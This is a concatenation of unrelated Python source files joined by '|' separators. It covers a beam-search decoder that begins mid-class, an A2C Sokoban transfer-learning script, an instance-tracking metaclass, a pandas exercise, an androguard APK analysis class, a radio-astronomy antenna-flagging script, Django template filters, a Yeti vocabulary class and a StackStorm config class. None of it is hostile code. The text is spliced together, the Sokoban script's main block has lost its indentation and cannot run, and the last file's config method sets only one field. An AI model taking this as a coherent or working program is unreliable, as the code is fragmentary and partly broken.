        np_mask = np.triu(np.ones((1, size, size)), k=1).astype('uint8')
        np_mask = Variable(torch.from_numpy(np_mask) == 0).cuda()
        return np_mask

    def init_vars(self, src, img, src_mask, img_mask, beam_size):
        """Prime the cross encoder and take the first decoding step,
        returning the initial beams and their log scores."""
        init_tok, mask_tok = 2, 4  # assumed BOS=2, MASK=4 — TODO confirm
        bs = src.size(0)
        i_outputs = self.vis_encoder(img, img_mask, mode=2)
        s_outputs = self.src_encoder(src, src_mask, mode=0)
        outputs = torch.LongTensor([[init_tok]] * bs).cuda()
        trg_mask = self.nopeak_mask(1).repeat(bs, 1, 1)
        t_outputs = self.trg_encoder(outputs, trg_mask, mode=1)
        input = torch.cat([i_outputs, s_outputs, t_outputs], dim=1)
        mask = torch.cat([img_mask, src_mask, trg_mask], dim=-1)
        e_outputs = self.cross_encoder(input, mask, step=1)
        mask_word = torch.ones(bs, 1).fill_(mask_tok).long().cuda()
        outputs = torch.cat([outputs, mask_word], dim=1)
        trg_mask = self.nopeak_mask(2).repeat(bs, 1, 1)
        t_outputs = self.trg_encoder(outputs, trg_mask, mode=1)
        out = self.logit(self.cross_encoder(t_outputs, trg_mask, step=2))
        out = F.softmax(out, dim=-1)
        # Top beam_size first tokens seed the beams.
        probs, ix = out[:, -1].data.topk(beam_size)
        log_scores = torch.log(probs)
        outputs = torch.zeros(bs, beam_size, self.config.tgt_max).long().cuda()
        outputs[:, :, 0] = init_tok
        outputs[:, :, 1] = ix
        return outputs, log_scores

    def k_best_outputs(self, outputs, out, log_scores, i, k):
        # Expand each beam by its top-k next tokens, then keep the k best
        # (beam, token) combinations overall.
        probs, ix = out[:, -1].data.topk(k)
        log_probs = torch.Tensor([math.log(p) for p in probs.data.view(-1)]).view(k, -1).cuda() + log_scores.transpose(0,1)
        k_probs, k_ix = log_probs.view(-1).topk(k)
        # row = k_ix // k
        row = torch.div(k_ix, k, rounding_mode='floor')  # source beam index
        col = k_ix % k                                   # token choice within that beam
        outputs[:, :i] = outputs[row, :i]
        outputs[:, i] = ix[row, col]
        log_scores = k_probs
        return outputs, log_scores

    def beam_search(self, src, img, src_mask, img_mask, beam_size=5):
        """Beam search decoding; returns one finished sequence per batch
        element, length-normalized (alpha=0.7) when all beams finish."""
        outputs, log_scores = self.init_vars(src, img, src_mask, img_mask, beam_size)
        # Replicate the source mask across beams and flatten to (bs*beam, ...).
        src_mask = src_mask.unsqueeze(1).expand(src_mask.size(0), beam_size, src_mask.size(-2), src_mask.size(-1))
        src_mask = src_mask.contiguous().view(-1, src_mask.size(-2), src_mask.size(-1))
        eos_tok, mask_tok = 3, 4  # assumed EOS=3, MASK=4 — TODO confirm
        bs = src.size(0)
        final = torch.zeros(bs, self.config.tgt_max).long().cuda()
        mask_word = torch.ones(1, 1).fill_(mask_tok).long().cuda()
        for i in range(2, self.config.tgt_max):
            # Score all beams in one batch: append MASK, encode, predict.
            tmp = outputs.view(-1, outputs.size(-1))[:, :i]
            tmp = torch.cat([tmp, mask_word.repeat(tmp.size(0), 1)], dim=1)
            trg_mask = self.nopeak_mask(i+1).repeat(tmp.size(0), 1, 1)
            t_outputs = self.trg_encoder(tmp, trg_mask, mode=1)
            out = self.logit(self.cross_encoder(t_outputs, trg_mask, step=i+1))
            out = F.softmax(out, dim=-1)
            out = out.view(bs, beam_size, -1, out.size(-1))
            for b in range(bs):
                outputs[b], log_scores[b] = self.k_best_outputs(outputs[b], out[b], log_scores[b].unsqueeze(0), i, beam_size)
                ones = (outputs[b]==eos_tok).nonzero() # Occurrences of end symbols for all input sentences.
                sentence_lengths = torch.zeros(len(outputs[b]), dtype=torch.long).cuda()
                for vec in ones:
                    if sentence_lengths[vec[0]]==0: # First end symbol has not been found yet
                        sentence_lengths[vec[0]] = vec[1] # Position of first end symbol
                num_finished_sentences = len([s for s in sentence_lengths if s > 0])
                if num_finished_sentences == beam_size:
                    # All beams finished: pick the best length-normalized beam.
                    alpha = 0.7
                    div = 1/(sentence_lengths.type_as(log_scores[b])**alpha)
                    _, ind = torch.max(log_scores[b] * div, 0)
                    if final[b].sum() == 0:
                        final[b] = outputs[b][ind]
        # Fallback: if no batch element ever finished, take its top beam.
        for b in range(bs):
            if final[b].sum() == 0:
                final[b] = outputs[b][0]
        return final
|
import gym
import gym_sokoban
from common.fix_and_reinit import fix_and_reinit
from common.train_the_agent import train_the_agent
from common.ActorCritic import ActorCritic
from common.RolloutStorage import RolloutStorage
from common.multiprocessing_env import SubprocVecEnv
import torch
import torch.autograd as autograd
import torch.optim as optim
import argparse
import wandb
def train(args, wandb_session):
    """Pre-train an A2C agent on a source Sokoban task, then fix/reinit a
    subset of its parameters and fine-tune on the target task.

    :param args: parsed CLI namespace (task, num_envs, lr, USE_CUDA, ...)
    :param wandb_session: active wandb run used by train_the_agent for logging
    """
    if args.task == 's1t1fc_game2':
        fix = 'conv'
        source_env_name = 'Curriculum-Sokoban-v2'
        # BUG FIX: this was misspelled 'taget_env_name', which left
        # 'target_env_name' undefined in this branch and raised a
        # NameError when the target envs were created below.
        target_env_name = 'Curriculum-Sokoban-v4'
    else:
        # Task string encodes source/target task ids and which layer to fix,
        # e.g. 's1t2k1' -> source '1', target '2', fix 'k'.
        fix = args.task[5]
        source_env_name = 'Curriculum-Sokoban-v2'
        target_env_name = 'Curriculum-Sokoban-v2'
    source_task = args.task[1]
    target_task = args.task[3]
    if source_task == target_task:
        # Same map id for both phases: use the '<id>_2' copy as target.
        target_task = str(target_task) + '_2'
    source_task_map = args.map_file + str(source_task)
    target_task_map = args.map_file + str(target_task)

    def make_env(env_name, data_path):
        # SubprocVecEnv expects zero-arg thunks that each build a fresh env.
        def _thunk():
            return gym.make(env_name, data_path=data_path)
        return _thunk

    # --- source task training ---
    envs = SubprocVecEnv([make_env(source_env_name, source_task_map) for _ in range(args.num_envs)])
    state_shape = (3, 80, 80)
    num_actions = 5
    actor_critic = ActorCritic(state_shape, num_actions=num_actions)
    rollout = RolloutStorage(args.rolloutStorage_size, args.num_envs, state_shape)
    optimizer = optim.RMSprop(actor_critic.parameters(), lr=args.lr, eps=args.eps, alpha=args.alpha)
    if args.USE_CUDA:
        if not torch.cuda.is_available():
            raise ValueError('You wanna use cuda, but the machine you are on doesnt support')
        Variable = lambda *a, **kw: autograd.Variable(*a, **kw).cuda()
        actor_critic.cuda()
        rollout.cuda()
    else:
        Variable = lambda *a, **kw: autograd.Variable(*a, **kw)
    print('Pre-training the agent...')
    train_the_agent(envs, args.num_envs, Variable, state_shape, actor_critic, optimizer, rollout, data_path=None, args=args, wandb_session=wandb_session)  # train and save the model

    # --- target task training ---
    envs = SubprocVecEnv([make_env(target_env_name, target_task_map) for _ in range(args.num_envs)])
    # Freeze the chosen layer(s) and reinitialize the rest for transfer.
    actor_critic, optimizer = fix_and_reinit(actor_critic, optimizer, fix)
    print('Fine-tunning the agent...')
    train_the_agent(envs, args.num_envs, Variable, state_shape, actor_critic, optimizer, rollout, data_path=target_task_map, args=args, wandb_session=wandb_session)  # train and save the model
if __name__ == "__main__":
description = 'TLCLS'
parser = argparse.ArgumentParser(description=description)
parser.add_argument('--num_steps', type=int, default=1000000)
parser.add_argument('--task', type=str, default='s1t1k1')
parser.add_argument('--runs', type=int, default=3)
parser.add_argument('--gamma', type=float, default=0.99)
parser.add_argument('--entropy_coef', type=float, default=0.1)
parser.add_argument('--value_loss_coef', type=float, default=0.5)
parser.add_argument('--max_grad_norm', type=float, default=0.5)
parser.add_argument('--rolloutStorage_size', type=int, default=5)
parser.add_argument('--num_envs', type=int, default=30)
parser.add_argument('--eval_freq', type=int, default=1000)
parser.add_argument('--eval_num', type=int, default=20)
parser.add_argument('--lr', type=float, default=7e-4)
parser.add_argument('--eps', type=float, default=1e-5)
parser.add_argument('--alpha', type=float, default=0.99)
parser.add_argument('--map_file', type=str, default='./maps/')
args = parser.parse_args()
args.USE_CUDA = True
for run in range(args.runs):
wandb_session = wandb.init(project='TLCLS', config=vars(args), name="run-%i"%(run), reinit=True, group=args.task, mode='disabled')
config = wandb.config
train(args, wandb_session)
wandb_session.finish()
|
from typing import Iterable
class CollectorType(type):
    """
    Metaclass that gives every class created with it a class-level
    ``_objects`` set tracking all instances ever constructed, and makes
    the class itself iterable / indexable / sized over that set.

    NOTE(review): ``_objects`` holds strong references, so tracked
    instances are never garbage-collected until ``clear()`` is called.
    Instances must also be hashable to be stored in the set.
    """
    # it is a staticmethod
    def __new__(
        collectorType: type, new_cls_name: str, new_cls_bases: tuple, class_definition_dict: dict,
    ):
        # Plain class creation; all registration wiring happens in __init__.
        new_cls = super().__new__(collectorType, new_cls_name, new_cls_bases, class_definition_dict)
        return new_cls  # __init__()
    # called before __new__ return automatically
    def __init__(new_cls: type, new_cls_name: str, new_cls_bases: tuple, new_cls_dict: dict):
        super().__init__(new_cls_name, new_cls_bases, new_cls_dict)
        # Each class (including each subclass) gets its own registry.
        new_cls._objects = set()
        original_init = new_cls.__init__
        # Wrap __init__ so every successfully constructed instance is
        # recorded. The closure captures new_cls, so instances register on
        # the class being defined here.
        def new_init(self, *args, **kwargs):
            original_init(self, *args, **kwargs)
            new_cls._objects.add(self)
        new_cls.__init__ = new_init
    def __iter__(new_cls) -> Iterable:
        # Iteration order is arbitrary (set semantics).
        return iter(new_cls._objects)
    def clear(new_cls):
        # Drop all tracked instances (releases the strong references).
        new_cls._objects.clear()
    def __getitem__(new_cls, item):
        # Lookup by equality against tracked instances, not positional index.
        for i in new_cls:
            if item == i:
                return i
        raise IndexError(f"object with index ({item}) not found")
    def __len__(new_cls):
        return len(new_cls._objects)
|
'''
You will now make use of what you've learned from this chapter to solve a simple data extraction problem. You will also be introduced to a data structure, the pandas Series, in this exercise. We won't elaborate on it much here, but what you should know is that it is a data structure that you will be working with a lot of times when analyzing data from pandas DataFrames. You can think of DataFrame columns as single-dimension arrays called Series.
In this exercise, you will be using a list comprehension to extract the time from time-stamped Twitter data. The pandas package has been imported as pd and the file 'tweets.csv' has been imported as the df DataFrame for your use.
'''
# Extract the created_at column from df: tweet_time
# (df is a pandas DataFrame loaded from 'tweets.csv' by the exercise
# environment; it is not defined in this file.)
tweet_time = df.created_at
# Extract the clock time: tweet_clock_time
# Characters 11:19 of each timestamp are presumably the HH:MM:SS portion —
# depends on the exact created_at string format.
tweet_clock_time = [entry[11:19] for entry in tweet_time]
# Print the extracted times
print(tweet_clock_time)
|
import logging
import os
import hashlib
from intent import Intent
class App(object):
    """
    Describes an Android app (APK) and exposes its static-analysis results:
    package name, activities, permissions, launch intents and file hashes.
    """
    def __init__(self, app_path, output_dir=None):
        """
        create an App instance and eagerly run androguard static analysis
        :param app_path: local file path of app (must not be None)
        :param output_dir: optional output directory; created when missing
        :return:
        """
        assert app_path is not None
        self.logger = logging.getLogger(self.__class__.__name__)
        self.app_path = app_path
        self.output_dir = output_dir
        if output_dir is not None:
            if not os.path.isdir(output_dir):
                os.makedirs(output_dir)
        self.androguard = AndroguardAnalysis(self.app_path)
        self.package_name = self.androguard.a.get_package()
        self.main_activity = self.androguard.a.get_main_activity()
        # Fallback main activity; populated externally (e.g. from dumpsys)
        # and used when the manifest does not declare one.
        self.dumpsys_main_activity = None
        self.possible_broadcasts = self.get_possible_broadcasts()
        self.permissions = self.androguard.a.get_permissions()
        self.activities = None
        self.get_activities()
        self.hashes = self.get_hashes()

    def get_androguard_analysis(self):
        """
        Return the androguard static-analysis result, creating it lazily.
        :return: AndroguardAnalysis instance
        """
        if self.androguard is None:
            self.androguard = AndroguardAnalysis(self.app_path)
        return self.androguard

    def get_package_name(self):
        """
        get package name of current app
        :return: package name string
        """
        if self.package_name is None:
            self.package_name = self.get_androguard_analysis().a.get_package()
        return self.package_name

    def get_main_activity(self):
        """
        Get the main (launcher) activity of the app.
        :return: activity name from the manifest, or the dumpsys fallback
        """
        if self.main_activity is None:
            self.main_activity = self.get_androguard_analysis().a.get_main_activity()
        if self.main_activity is not None:
            return self.main_activity
        self.logger.warning("Cannot get main activity from manifest. Using dumpsys result instead.")
        return self.dumpsys_main_activity

    def get_activities(self):
        """
        get all activities in the app, with the corresponding attributes
        :return: a dict, each key is an activity name and the value is a dict of attributes
        """
        if self.activities is None:
            self.activities = {}
            manifest = self.get_androguard_analysis().a.get_android_manifest_xml()
            for activity_dom in manifest.getElementsByTagName("activity"):
                activity_name = None
                activity_attrs = {}
                for key in activity_dom.attributes.keys():
                    attr = activity_dom.attributes.get(key)
                    activity_attrs[key] = attr.value
                    if key == "android:name":
                        activity_name = attr.value
                self.activities[activity_name] = activity_attrs
        return self.activities

    def get_activity_launch_mode(self, activity):
        """
        get launch mode of an activity
        :param activity: the name of the activity
        :return: launch-mode string ("standard" when unspecified), or None
            when the activity is not declared in the manifest
        """
        activities = self.get_activities()
        if activities is None:
            return None
        if activity not in activities:
            return None
        # "standard" is Android's default when android:launchMode is absent.
        return activities[activity].get('android:launchMode', 'standard')

    def get_permissions(self):
        """
        Get the permissions requested in the app's manifest.
        :return: list of permission strings
        """
        if self.permissions is None:
            self.permissions = self.get_androguard_analysis().a.get_permissions()
        return self.permissions

    def get_start_intent(self):
        """
        get an intent to start the app
        :return: Intent
        """
        package_name = self.get_package_name()
        if self.get_main_activity():
            package_name += "/%s" % self.get_main_activity()
        return Intent(suffix=package_name)

    def get_start_with_profiling_intent(self, trace_file, sampling=None):
        """
        get an intent to start the app with profiling
        :param trace_file: path the profiler writes its trace to
        :param sampling: optional profiler sampling interval
        :return: Intent
        """
        package_name = self.get_package_name()
        if self.get_main_activity():
            package_name += "/%s" % self.get_main_activity()
        if sampling is not None:
            return Intent(prefix="start --start-profiler %s --sampling %d" % (trace_file, sampling), suffix=package_name)
        return Intent(prefix="start --start-profiler %s" % trace_file, suffix=package_name)

    def get_stop_intent(self):
        """
        get an intent to stop the app
        :return: Intent
        """
        package_name = self.get_package_name()
        return Intent(prefix="force-stop", suffix=package_name)

    def get_possible_broadcasts(self):
        """
        Enumerate broadcast intents the app's receivers could respond to.
        :return: set of Intent objects (one per action/category combination)
        """
        possible_broadcasts = set()
        androguard_a = self.get_androguard_analysis().a
        for receiver in androguard_a.get_receivers():
            intent_filters = androguard_a.get_intent_filters('receiver', receiver)
            actions = intent_filters.get('action', [])
            # Copy before appending so androguard's own structure is not
            # mutated; None stands for "no category".
            categories = list(intent_filters.get('category', []))
            categories.append(None)
            for action in actions:
                for category in categories:
                    intent = Intent(prefix='broadcast', action=action, category=category)
                    possible_broadcasts.add(intent)
        return possible_broadcasts

    def get_hashes(self, block_size=2 ** 8):
        """
        Calculate MD5, SHA-1 and SHA-256 hashes of the APK input file.
        :param block_size: number of bytes read per chunk
        :return: [md5, sha1, sha256] hex digest strings
        """
        md5 = hashlib.md5()
        sha1 = hashlib.sha1()
        sha256 = hashlib.sha256()
        # Context manager guarantees the handle is closed (the original
        # implementation leaked it).
        with open(self.app_path, 'rb') as f:
            while True:
                data = f.read(block_size)
                if not data:
                    break
                md5.update(data)
                sha1.update(data)
                sha256.update(data)
        return [md5.hexdigest(), sha1.hexdigest(), sha256.hexdigest()]
class AndroguardAnalysis(object):
    """
    analysis result of androguard

    ``a`` is the parsed APK object; ``d`` and ``dx`` stay None until
    ``get_detailed_analysis`` is called.
    """
    def __init__(self, app_path):
        """
        :param app_path: local file path of app, should not be None
        analyse app specified by app_path
        """
        self.app_path = app_path
        # Imported lazily so androguard is only required when analysis runs.
        from androguard.core.bytecodes.apk import APK
        self.a = APK(app_path)
        self.d = None
        self.dx = None
    def get_detailed_analysis(self):
        """Run full dex analysis, populating ``self.d`` and ``self.dx``."""
        from androguard.misc import AnalyzeDex
        # NOTE(review): AnalyzeDex's signature differs across androguard
        # versions — confirm the (dex, raw=True) form matches the pinned one.
        self.d, self.dx = AnalyzeDex(self.a.get_dex(), raw=True)
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2018 the HERA Project
# Licensed under the MIT License
import numpy
import optparse
from hera_cal import omni
from hera_qm import vis_metrics
from pyuvdata import UVData
import aipy as a
import sys
o = optparse.OptionParser()
o.set_usage("omni_run.py -C [calfile] [options] *.uvc")
a.scripting.add_standard_options(o, cal=True)
o.add_option('--frac', default=.3,
             help='Fraction of total number of antennas to flag as bad and write out')
o.add_option('--write', action='store_true',
             help='write out simple txt file of bad antennas/bls')
o.add_option('--ex_ants',
             help='list of known bad antennas to exclude from metrics.')
opts, args = o.parse_args(sys.argv[1:])

# read in miriad file to get frequency info for aa
uv = a.miriad.UV(args[0])
fqs = a.cal.get_freqs(uv['sdf'], uv['sfreq'], uv['nchan'])
del(uv)
# create antenna array
aa = a.cal.get_aa(opts.cal, fqs)
info = omni.aa_to_info(aa)  # we have no info here
reds = info.get_reds()

# parse ex_ants: comma-separated antenna numbers; skip non-integer tokens
ex_ants = []
if opts.ex_ants:
    for ant in opts.ex_ants.split(','):
        try:
            ex_ants.append(int(ant))
        except ValueError:
            # BUGFIX: narrowed from BaseException, which also swallowed
            # KeyboardInterrupt/SystemExit.
            pass

for filename in args:
    uvd = UVData()
    uvd.read_miriad(filename)
    if uvd.phase_type != 'drift':
        uvd.unphase_to_drift()
    data, flags = omni.UVData_to_dict([uvd])
    # BUGFIX: the module is imported as `vis_metrics`, not `metrics`.
    bad_ants = vis_metrics.check_ants(reds, data, skip_ants=ex_ants)
    # BUGFIX: copy the known-bad list instead of aliasing it, so antennas
    # flagged for one file no longer leak into every later file's list.
    total_ba = list(ex_ants)
    for ba in bad_ants:
        # flag an antenna when its bad count exceeds frac of the array
        if bad_ants[ba] > opts.frac * len(info.subsetant):
            if isinstance(ba[-1], str):
                # (ant, pol) key: keep just the antenna number.
                # BUGFIX: append inside this branch; previously a stale
                # ret_ba was appended (or NameError) for baseline keys.
                total_ba.append(ba[0])
            # else it's a baseline — not supported yet, skip it
    if opts.write:
        print('Writing {0} to file'.format(total_ba))
        # BUGFIX: context manager closes/flushes the output file.
        with open(filename + '.badants.txt', 'w') as writefile:
            writefile.write(','.join(map(str, total_ba)))
|
#%%
import re
#%%
# Pattern: optional run of non-letters, then an optional greeting — "yo",
# "ello", "hello" or "'ello" (case-insensitive via the compile flag).
r = r"[^a-z]*([y]o|[h']?ello)?"
re_greeting = re.compile(r,flags=re.IGNORECASE)
# match() anchors at the start; since every part of the pattern is optional
# this always produces a Match object (possibly zero-length), never None.
re_match = re_greeting.match(input())
print(re_match)
# %%
# %%
|
import datetime
import decimal
from typing import Dict, Any
from django import template
from django.conf import settings
from django.template.defaultfilters import date
from django.urls import NoReverseMatch, reverse
from django.utils import timezone
from django.utils.safestring import mark_safe
from utilities.forms import get_selected_values, TableConfigForm
from utilities.utils import get_viewname
register = template.Library()
#
# Filters
#
@register.filter()
def viewname(model, action):
    """
    Return the view name for the given model and action. Does not perform any validation.

    :param model: A Django model class or instance
    :param action: Action verb used to build the view name (e.g. "list")
    """
    return get_viewname(model, action)
@register.filter()
def validated_viewname(model, action):
    """
    Return the view name for the given model and action if valid, or None if invalid.
    """
    name = get_viewname(model, action)
    try:
        # A successful reverse() proves the view name resolves.
        reverse(name)
    except NoReverseMatch:
        return None
    return name
@register.filter()
def humanize_speed(speed):
    """
    Humanize speeds given in Kbps. Examples:
        1544 => "1.544 Mbps"
        100000 => "100 Mbps"
        10000000 => "10 Gbps"
    """
    if not speed:
        return ''
    # Try each whole-unit threshold from largest to smallest.
    for divisor, unit in ((1000000000, 'Tbps'), (1000000, 'Gbps'), (1000, 'Mbps')):
        if speed >= divisor and speed % divisor == 0:
            return '{} {}'.format(int(speed / divisor), unit)
    if speed >= 1000:
        # Not a whole number of Mbps: keep the fractional part.
        return '{} Mbps'.format(float(speed) / 1000)
    return '{} Kbps'.format(speed)
@register.filter()
def humanize_megabytes(mb):
    """
    Express a number of megabytes in the most suitable unit (e.g. gigabytes or terabytes).
    """
    if not mb:
        return ''
    # Binary units: 1 TB = 1048576 MB, 1 GB = 1024 MB.
    for factor, unit in ((1048576, 'TB'), (1024, 'GB')):
        if mb >= factor:
            return f'{int(mb / factor)} {unit}'
    return f'{mb} MB'
@register.filter()
def simplify_decimal(value):
    """
    Return the simplest expression of a decimal value. Examples:
      1.00 => '1'
      1.20 => '1.2'
      1.23 => '1.23'

    Non-Decimal values are returned unchanged.
    """
    if type(value) is not decimal.Decimal:
        return value
    text = str(value)
    # BUGFIX: only strip trailing zeros when a decimal point is present;
    # otherwise Decimal('100') would be mangled into '1'.
    if '.' not in text:
        return text
    return text.rstrip('0').rstrip('.')
@register.filter(expects_localtime=True)
def annotated_date(date_value):
    """
    Returns date as HTML span with short date format as the content and the
    (long) date format as the title.
    """
    if not date_value:
        return ''
    # Exact type check on purpose: datetime.datetime subclasses date but
    # must use the datetime format names.
    if type(date_value) == datetime.date:
        fmt_long, fmt_short = 'DATE_FORMAT', 'SHORT_DATE_FORMAT'
    else:
        fmt_long, fmt_short = 'DATETIME_FORMAT', 'SHORT_DATETIME_FORMAT'
    return mark_safe(f'<span title="{date(date_value, fmt_long)}">{date(date_value, fmt_short)}</span>')
@register.simple_tag
def annotated_now():
    """
    Returns the current date piped through the annotated_date filter.
    """
    # Only attach a timezone when the project uses timezone-aware datetimes.
    if settings.USE_TZ:
        now = datetime.datetime.now(tz=timezone.get_current_timezone())
    else:
        now = datetime.datetime.now(tz=None)
    return annotated_date(now)
@register.filter()
def divide(x, y):
    """
    Return x/y (rounded), or None when either operand is None.
    """
    if x is not None and y is not None:
        return round(x / y)
    return None
@register.filter()
def percentage(x, y):
    """
    Return x/y as a rounded percentage, or None when either operand is None.
    """
    if x is not None and y is not None:
        return round(x / y * 100)
    return None
@register.filter()
def get_docs_url(model):
    """
    Return the static documentation URL for the specified model.
    """
    meta = model._meta
    return '{}docs/models/{}/{}/'.format(settings.STATIC_URL, meta.app_label, meta.model_name)
@register.filter()
def has_perms(user, permissions_list):
    """
    Return True if the user has *all* permissions in the list.

    :param user: A Django user instance
    :param permissions_list: Iterable of permission names (e.g. "app.view_model")
    """
    return user.has_perms(permissions_list)
@register.filter()
def as_range(n):
    """
    Return a range of n items, or an empty list when n cannot be coerced
    to an integer (None, arbitrary objects, non-numeric strings).
    """
    try:
        n = int(n)
    except (TypeError, ValueError):
        # BUGFIX: ValueError (e.g. n="abc") previously escaped the handler.
        return list()
    # BUGFIX: range the coerced integer so numeric strings like "5" work;
    # the original passed the raw value to range() and raised TypeError.
    return range(n)
@register.filter()
def meters_to_feet(n):
    """
    Convert a length from meters to feet (1 m = 3.28084 ft).
    """
    FEET_PER_METER = 3.28084
    return float(n) * FEET_PER_METER
@register.filter("startswith")
def startswith(text: str, starts: str) -> bool:
    """
    Template implementation of `str.startswith()`.
    """
    # Non-string values (None, ints, ...) never match.
    return isinstance(text, str) and text.startswith(starts)
@register.filter
def get_key(value: Dict, arg: str) -> Any:
    """
    Template implementation of `dict.get()`, for accessing dict values
    by key when the key is not able to be used in a template. For
    example, `{"ui.colormode": "dark"}`. Returns None on a missing key.
    """
    return value.get(arg)
@register.filter
def get_item(value: object, attr: str) -> Any:
    """
    Template implementation of `__getitem__`, for accessing the `__getitem__` method
    of a class from a template.

    Works on any subscriptable object; propagates the object's own
    KeyError/IndexError on a missing key or index.
    """
    return value[attr]
@register.filter
def status_from_tag(tag: str = "info") -> str:
    """
    Determine Bootstrap theme status/level from Django's Message.level_tag.
    """
    tag = tag.lower()
    # 'error' and 'debug' map to different Bootstrap levels; the rest pass
    # through, and anything unknown falls back to 'info'.
    if tag == 'error':
        return 'danger'
    if tag in ('warning', 'success'):
        return tag
    return 'info'
@register.filter
def icon_from_status(status: str = "info") -> str:
    """
    Determine icon class name from Bootstrap theme status/level.
    """
    status = status.lower()
    if status in ('warning', 'danger'):
        return 'alert'
    if status == 'success':
        return 'check-circle'
    # 'info' and anything unrecognized share the information icon.
    return 'information'
#
# Tags
#
@register.simple_tag()
def querystring(request, **kwargs):
    """
    Append or update the page number in a querystring.
    """
    params = request.GET.copy()
    for key, value in kwargs.items():
        if value is None:
            # A None value removes the parameter entirely (if present).
            params.pop(key, None)
        else:
            params[key] = str(value)
    encoded = params.urlencode(safe='/')
    return f'?{encoded}' if encoded else ''
@register.inclusion_tag('helpers/utilization_graph.html')
def utilization_graph(utilization, warning_threshold=75, danger_threshold=90):
    """
    Display a horizontal bar graph indicating a percentage of utilization.
    """
    # Bar color: full > danger > warning > ok; neutral gray when both
    # thresholds are disabled (falsy).
    if utilization == 100:
        css_class = 'bg-secondary'
    elif danger_threshold and utilization >= danger_threshold:
        css_class = 'bg-danger'
    elif warning_threshold and utilization >= warning_threshold:
        css_class = 'bg-warning'
    elif warning_threshold or danger_threshold:
        css_class = 'bg-success'
    else:
        css_class = 'bg-gray'
    return {'utilization': utilization, 'bar_class': css_class}
@register.inclusion_tag('helpers/table_config_form.html')
def table_config_form(table, table_name=None):
    """
    Render the column-configuration form for a table.

    :param table: The table instance being configured
    :param table_name: Optional name override (defaults to the table's class name)
    """
    return {
        'table_name': table_name or table.__class__.__name__,
        'form': TableConfigForm(table=table),
    }
@register.inclusion_tag('helpers/applied_filters.html')
def applied_filters(form, query_params):
    """
    Display the active filters for a given filter form.

    :param form: A bound filter form
    :param query_params: QueryDict of the request's GET parameters
    """
    # Run validation for its side effect of populating cleaned_data; the
    # boolean result itself is irrelevant here.
    form.is_valid()
    applied_filters = []
    for filter_name in form.changed_data:
        if filter_name not in form.cleaned_data:
            continue
        querydict = query_params.copy()
        if filter_name not in querydict:
            continue
        bound_field = form.fields[filter_name].get_bound_field(form, filter_name)
        # link_url reproduces the current query minus this filter, so
        # following the link removes it.
        querydict.pop(filter_name)
        display_value = ', '.join([str(v) for v in get_selected_values(form, filter_name)])
        applied_filters.append({
            'name': filter_name,
            'value': form.cleaned_data[filter_name],
            'link_url': f'?{querydict.urlencode()}',
            'link_text': f'{bound_field.label}: {display_value}',
        })
    return {
        'applied_filters': applied_filters,
    }
|
from yeti.core.model.settings.setting import Setting
from yeti.core.errors import RuntimeException
class Vocabs(Setting):
    """This object interacts with vocabularies stored in Yeti.

    Attributes:
        name: Name of the Vocab setting
    """
    name = 'vocabs'

    def get_vocab(self, vocab_name):
        """Gets a specific vocab by name.

        Args:
            vocab_name: The name of the vocab to get.

        Returns:
            The list of values stored for that vocab.

        Raises:
            RuntimeException: When no vocab with that name is defined.
        """
        if vocab_name not in self.settings:
            raise RuntimeException('{0:s} is not a defined vocabulary'.format(
                vocab_name))
        return self.settings[vocab_name]

    def set_vocab(self, vocab_name, vocab_list):
        """Sets (replaces) the vocab list and persists the setting."""
        self.settings[vocab_name] = vocab_list
        self.save()

    def add_value_to_vocab(self, vocab_name, value):
        """Adds a vocabulary item for a given vocab.

        The vocab is created on the fly when missing; duplicate values are
        not added twice. The setting is saved in all cases.

        Args:
            vocab_name: The name of the vocab to update.
            value: The value to add.
        """
        # `not in` instead of `not ... in` (PEP 8 idiom).
        if vocab_name not in self.settings:
            self.settings[vocab_name] = []
        if value not in self.settings[vocab_name]:
            self.settings[vocab_name].append(value)
        self.save()

    def remove_value_from_vocab(self, vocab_name, value):
        """Removes a value from a vocab.

        Args:
            vocab_name: The vocab from which to remove the value.
            value: The value to remove.

        Raises:
            RuntimeException: A vocab is not defined or the vocab is not
                in the vocab list.
        """
        if vocab_name not in self.settings:
            raise RuntimeException('{0:s} is not a defined vocabulary'.format(
                vocab_name))
        if value not in self.settings[vocab_name]:
            raise RuntimeException('"{0:s}" not in vocab {1:s}'.format(
                value, vocab_name))
        self.settings[vocab_name].remove(value)
        self.save()

    def filter_values_vocab(self, vocab_name, value_filter):
        """Returns vocabulary items containing *value_filter* as a substring.

        Args:
            vocab_name: The name of the vocab to filter.
            value_filter: string to filter vocabs with.

        Returns:
            List of matching values.
        """
        return [value for value in self.settings[vocab_name]
                if value_filter in value]


# Register this setting type so Setting can dispatch on its name.
Setting.types[Vocabs.name] = Vocabs
|
# encoding: utf-8
"""
Copyright 2017 Brocade Communications Systems, Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from st2common.runners.base_action import Action
CONFIG_ITEMS = ['username', 'method']
class BaseConfig(Action):
    """This class loads the correct config environment for the run."""

    def __init__(self, config):
        """Constructor for checking the environment.

        :param config: pack config dict; must either define a non-empty
            'environment' section or supply every CONFIG_ITEMS key at the
            top level.
        :raises ValueError: when config is missing or 'environment' is empty.
        :raises KeyError: when a required top-level config item is absent.
        """
        super(BaseConfig, self).__init__(config)
        if config is None:
            raise ValueError("No connection configuration details found")
        if "environment" in config:
            if config['environment'] is None:
                raise ValueError("'environment' config defined but empty.")
        else:
            # No environments defined: required items must exist at the
            # top level of the config.
            for item in CONFIG_ITEMS:
                if item not in config:
                    # Typo fix: "Mising" -> "Missing".
                    raise KeyError("Config.yaml Missing: %s" % (item))

    def _set_config(self, environment):
        """Populate connection attributes from the selected environment.

        Falls back to the 'default' environment when *environment* is not
        defined, and to empty strings for optional credential fields.

        :raises KeyError: when a required key is absent from the selected
            environment's config.
        """
        if environment and environment in self.config['environment']:
            group_config = self.config['environment'].get(environment)
            for item in CONFIG_ITEMS:
                if item not in group_config:
                    raise KeyError("Config.yaml Missing: environment key:%s:%s"
                                   % (environment, item))
        else:
            group_config = self.config['environment'].get('default')
        # NOTE: errors are no longer re-wrapped in a bare Exception — the
        # original exception (and its traceback) now propagates directly.
        # Required fields; .encode() mirrors the original byte-string
        # coercion from the Python 2 era.
        self.method = group_config['method'].encode('utf-8', 'ignore')
